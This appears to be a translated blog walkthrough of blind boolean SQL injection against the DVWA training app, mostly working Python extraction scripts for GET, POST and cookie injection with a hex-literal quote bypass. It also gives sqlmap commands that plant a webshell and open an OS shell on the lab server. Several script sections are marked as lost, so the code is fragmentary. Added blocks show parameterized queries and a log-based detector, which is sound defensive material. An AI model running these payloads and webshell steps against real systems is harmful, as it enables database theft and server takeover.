All the code in this article can be downloaded from JacquelinXiang/sqli_bool: A simple tool/framework for boolean-based sql injection(GET/POST/COOKIE) (github.com); the README explains how to use it.
This article may not be reproduced without permission, and neither may my other original articles.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contents
LOW
Walkthrough
Code analysis
MEDIUM
Walkthrough
Code analysis
HIGH
Walkthrough
Code analysis
IMPOSSIBLE
Code analysis
LOW
Walkthrough
1. Observe what the page returns:
Enter 1 and press Submit: the page returns User ID exists in the database.
Enter 6 and press Submit: the page returns User ID is MISSING from the database.
So a valid value returns User ID exists in the database and an invalid value returns User ID is MISSING from the database; that difference is the true/false oracle everything below relies on.
2. Find the closing character
Enter 1' and press Submit: the page returns User ID is MISSING from the database.
Enter 1'' and press Submit: the page returns User ID exists in the database.
So the string is closed with a single quote.
3. Dump the database
Doing the rest purely by hand would be far too slow, so I wrote a Python script to extract the database.
#!/usr/bin/python3
# coding=utf-8
"""
functions for boolean-based sql injection(GET)
:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
import requests

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind"  # URL of the vulnerable page; fill in for your environment
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", }  # HTTP request headers; fill in for your environment
cookies = {"security": "low", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}  # a single cookie can go straight into headers; with two cookies use the dict-style cookies parameter
keylist = [chr(i) for i in range(33, 127)]  # digits, upper- and lower-case letters and printable special characters
flag = 'User ID exists in the database'  # text that shows the appended SQL condition was true; fill in from the page's response

def CurrentDatabaseGET():
    n = 10  # guessed upper bound on the length of the current database name; fill in for your environment
    k = 0
    j = n//2
    length = 0
    db = str()
    while True:
        if j>k and j<n and j-k>3:
            payload1 = "1' and length(database())>"+str(j)+"-- ss"  # all payloads: fill in for your environment
            param = {
                "id":payload1,
                "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)  # send the request containing the payload with GET
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2  # midpoint of the current bounds
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (table names), were lost in extraction

        if j>k and j<n and j-k>3:
            payload4 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            param = {
                "id":payload4,
                "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (column names of a table), were lost in extraction

        if j>k and j<n and j-k>3:
            payload7 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"')))>"+str(j)+"-- ss"
            param = {
                "id":payload7,
                "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (row data of two columns), were lost in extraction

        if j>k and j<n and j-k>3:
            payload10 = "1' and (length((select group_concat(concat("+col1+",'^',"+col2+")) from "+table+")))>"+str(j)+"-- ss"  # '^' separates the two column values
            param = {
                "id":payload10,
                "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of the script was lost in extraction

select @@datadir

From that we can guess that the web root is probably C:\phpstudy_pro\WWW\dvwa\
Once we have the web root we can try to upload a webshell
(1) Method 1: -file-write
python sqlmap.py -u "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=434snj2pt58c6hmb5ojinsqi50" --technique B -file-write "E:\渗透测试学习资料\dvwa\file upload\sh.php" --file-dest "C:/phpstudy_pro/WWW/dvwa/shi.php"
The webshell upload succeeded

On the server you can see the written file; compared with the original file it contains an extra admin admin

Connection successful

(2) Method 2: --os-shell
python sqlmap.py -u "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=8qtjtspq8nt3rhen72m5e4msd7" --technique B --os-shell

The result it returned was failure, but when I looked on the server, although the backdoor had not been uploaded, the PHP file sqlmap uses for uploading files had in fact been written. The problems are, first, that because sqlmap reported an error we would not know this file had been written without logging into the server, and second, that the file name is somewhat random and, since sqlmap errored out, it does not tell us that name.


As for why the upload failed: I later switched to the low level of the SQL Injection level and found that, in the same environment, the upload succeeds there, so I compared the code of the two levels. Together with the 404 page not found in sqlmap's output, I think the line in this level's code, “header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );”, is what gets in the way. After commenting that line out, sure enough, sqlmap's upload succeeded.

Code analysis

A quick look at this level's code: the id parameter supplied by the user is executed as part of the SQL statement, which is what creates the SQL injection vulnerability. Slightly better than the low level of the SQL Injection level, though, database error messages are hidden from the user, and, as just described, line 19 also gets in the way of sqlmap's webshell upload.
MEDIUM
Walkthrough
1. Observe the page
A closer look shows that this level restricts the front end: you can only pick the numbers 1 to 5, and the form is not submitted with GET.

Capture a request with Burp Suite and send it to Repeater
Sending a number within the front-end range returns User ID exists in the database

Sending a number outside the front-end range returns User ID is MISSING from the database

That gives us our true/false oracle; time to get to work.
2. Find the closing character
With id=1', id=1'', id=1" and id=1"" the page always returns User ID is MISSING from the database, so presumably not only is the closing character not a quote, quotes are being filtered as well.
With id=6 or 1=1-- s the page returns User ID exists in the database, so id is injectable and needs no closing character.
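As an added example (mine, not the author's script or DVWA's PHP), the query styles discussed above side by side against an in-memory SQLite table: the LOW level's quoted splice of id, the MEDIUM level's quote-escaped but unquoted splice, and a hardened form with an integer check plus a bound parameter. It assumes a constructed users table and swaps database()/information_schema for SQLite's sqlite_master, since SQLite has neither.

```python
import sqlite3

# Constructed in-memory stand-in for DVWA's users table (not DVWA's real schema or data).
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])

def _found(sql, params=()):
    """The boolean oracle the page relies on: a row came back (exists) or not (MISSING).
    A SQL error is reported like MISSING, because these levels hide database errors."""
    try:
        return con.execute(sql, params).fetchone() is not None
    except sqlite3.Error:
        return False

def exists_low(user_id):
    """LOW-style: the raw id is spliced into a quoted literal, so 1' ... -- closes the quote."""
    return _found(f"SELECT first_name FROM users WHERE user_id = '{user_id}'")

def exists_medium(user_id):
    """MEDIUM-style: quotes are escaped, but the id is spliced unquoted into a numeric
    context, so a payload needs no closing quote at all (6 or 1=1-- s still works)."""
    escaped = user_id.replace("'", "''")
    return _found(f"SELECT first_name FROM users WHERE user_id = {escaped}")

def exists_hardened(user_id):
    """Hardened form: accept only a plain integer and bind it as a parameter, so the
    value reaches the driver as data and never as SQL syntax."""
    if not user_id.isdecimal():
        return False
    return _found("SELECT first_name FROM users WHERE user_id = ?", (int(user_id),))

# Constructed probes in the shape the page's scripts send. SQLite has no database() or
# information_schema, so the length probe measures the table list in sqlite_master instead.
PROBE_LOW_TRUE = "1' and length((select group_concat(name) from sqlite_master))>3-- ss"
PROBE_LOW_FALSE = "1' and length((select group_concat(name) from sqlite_master))>30-- ss"
PROBE_MEDIUM = "6 or 1=1-- s"

if __name__ == "__main__":
    for fn in (exists_low, exists_medium, exists_hardened):
        print(fn.__name__, [fn(p) for p in ("1", "6", PROBE_LOW_TRUE, PROBE_LOW_FALSE, PROBE_MEDIUM)])
```

Note that PROBE_MEDIUM fails against exists_low (the whole value is compared as one string) while PROBE_LOW_TRUE fails against exists_medium (1'' is a syntax error, reported like MISSING), which is exactly why the closing-character step comes before dumping anything.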

3. Dump the database
For this level I also wrote a Python script; its distinguishing features are POST form submission, multiple cookies, and bypassing the quote filter.
#!/usr/bin/python3
# coding=utf-8
"""
functions for boolean-based sql injection(POST,with Single quotes filtering bypass)
:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
import requests
import binascii

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/"  # URL of the vulnerable page; fill in for your environment
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
}  # HTTP request headers; fill in for your environment
cookies = {"security": "medium", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}  # a single cookie can go straight into headers; with two cookies use the dict-style cookies parameter
keylist = [hex(i) for i in range(33, 127)]  # hexadecimal ASCII: digits, upper- and lower-case letters and printable special characters
flag = 'User ID exists in the database'  # text that shows the appended SQL condition was true; fill in from the page's response

def CurrentDatabasePOST():
    n = 10  # guessed upper bound on the length of the current database name; fill in for your environment
    k = 0
    j = n//2
    length = 0
    db = str()
    while True:
        if j>k and j<n and j-k>3:
            payload1 = "1 and length(database())>"+str(j)+"-- ss"  # all payloads: fill in for your environment; no closing quote is needed at this level
            param = {
                "id":payload1,
                "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)  # send the request containing the payload with POST
            #print(response.request.body)
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2  # midpoint of the current bounds
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (table names), were lost in extraction

        if j>k and j<n and j-k>3:
            payload4 = "1 and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            param = {
                "id":payload4,
                "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (column names of a table), were lost in extraction

        if j>k and j<n and j-k>3:
            payload7 = "1 and (length((select group_concat(column_name) from information_schema.columns where table_name = 0x"+table+")))>"+str(j)+"-- ss"  # the table name is passed as a hex literal, so no quotes are needed
            param = {
                "id":payload7,
                "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (row data of two columns), were lost in extraction

        if j>k and j<n and j-k>3:
            payload10 = "1 and (length((select group_concat(concat("+col1+",0x5E,"+col2+")) from "+table+")))>"+str(j)+"-- ss"  # 0x5E is '^', the separator between the two column values
            param = {
                "id":payload10,
                "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of the POST script was lost in extraction, together with the HIGH-level walkthrough text and the beginning of its cookie-based script, which resumes below mid-function

            payload1 = "1' and length(database())>"+str(j)+"-- ss"  # all payloads: fill in for your environment
            cookies["id"] = payload1  # add a cookie key/value pair carrying the payload
            response = requests.get(url, headers = headers, cookies = cookies)  # send the request with GET; the payload travels in the cookie
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2  # midpoint of the current bounds
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (table names), were lost in extraction

        if j>k and j<n and j-k>3:
            payload4 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            cookies["id"] = payload4
            response = requests.get(url, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (column names of a table), were lost in extraction

        if j>k and j<n and j-k>3:
            payload7 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"')))>"+str(j)+"-- ss"
            cookies["id"] = payload7
            response = requests.get(url, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of this function, and the start of the next one (row data of two columns), were lost in extraction

        if j>k and j<n and j-k>3:
            payload10 = "1' and (length((select group_concat(concat("+col1+",'^',"+col2+")) from "+table+")))>"+str(j)+"-- ss"  # '^' separates the two column values
            cookies["id"] = payload10
            response = requests.get(url, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n+k)//2
        elif j-k==3 or j-k<3:
            ...  # the rest of the script was lost in extraction
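From the defender's side, an added example (mine, not from the sqli_bool project) that runs signature and burst detection for the probe shapes the three scripts on this page send, over constructed access-log records covering the GET query string, POST body and cookie channels that the LOW, MEDIUM and HIGH scripts use. It assumes a combined-log-format request line, and that POST bodies and Cookie headers are only available when something beyond the access log (a WAF or audit log) recorded them.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Signatures taken from the payload shapes this page's scripts send: length()/database()/
# information_schema/group_concat probes, "or 1=1", the "-- " terminator, and the 0x.. hex
# literals the MEDIUM script uses to get around the quote filter.
SIG_RE = re.compile(r"\blength\s*\(|\bdatabase\s*\(\s*\)|information_schema\.|\bgroup_concat\s*\("
                    r"|\b(?:and|or)\b\s+1\s*=\s*1|--\s|\b0x[0-9a-f]{2,}\b", re.IGNORECASE)
# Request line of the combined log format (adjust the pattern to your server's format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def extract_id(target, body=None, cookie=None):
    # Candidate id values of one request: query string (LOW), POST body (MEDIUM), Cookie header
    # (HIGH). body/cookie stay None unless something beyond the access log recorded them.
    values = parse_qs(urlsplit(target).query).get("id", [])
    if body:
        values += parse_qs(body).get("id", [])
    for part in (cookie or "").split(";"):
        name, _, val = part.strip().partition("=")
        if name == "id":
            values.append(val)
    return values

def analyze(records, burst=5):
    # records: (access_log_line, body_or_None, cookie_or_None). Returns the (ip, value) signature
    # hits and the (ip, template) pairs seen at least `burst` times; the template replaces every
    # digit run with N, so the near-identical probes of a length bisection collapse together.
    hits, templates = [], Counter()
    for line, body, cookie in records:
        m = LOG_RE.match(line)
        for val in extract_id(m["target"], body, cookie) if m else []:
            if SIG_RE.search(val):
                hits.append((m["ip"], val))
                templates[(m["ip"], re.sub(r"\d+", "N", val))] += 1
    return hits, {key: n for key, n in templates.items() if n >= burst}

def _get(sec, j):  # constructed LOW-level probe, URL-encoded the way requests sends it
    return (f'10.0.0.5 - - [01/Jan/2021:10:00:{sec:02d} +0000] "GET /dvwa/vulnerabilities/sqli_blind/'
            f'?id=1%27+and+length%28database%28%29%29%3E{j}--+ss&Submit=Submit HTTP/1.1" 200 4321', None, None)

SAMPLE = [_get(i, j) for i, j in enumerate((5, 2, 3, 4, 4))] + [  # five bisection probes from one client
    ('10.0.0.9 - - [01/Jan/2021:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit HTTP/1.1" 200 4321',
     None, None),  # benign request
    ('10.0.0.7 - - [01/Jan/2021:10:02:00 +0000] "POST /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1" 200 4321',
     "id=6+or+1%3D1--+s&Submit=Submit", None),  # MEDIUM-style POST: visible only if the body is logged
    ('10.0.0.8 - - [01/Jan/2021:10:03:00 +0000] "GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1" 200 4321',
     None, "security=high; id=1' and length(database())>4-- ss"),  # HIGH-style cookie, from a WAF/audit log
]
```

The burst count is the stronger of the two signals: a length bisection or per-character scan sends many requests that differ only in one number, which stands out even when a single request's signature has been disguised.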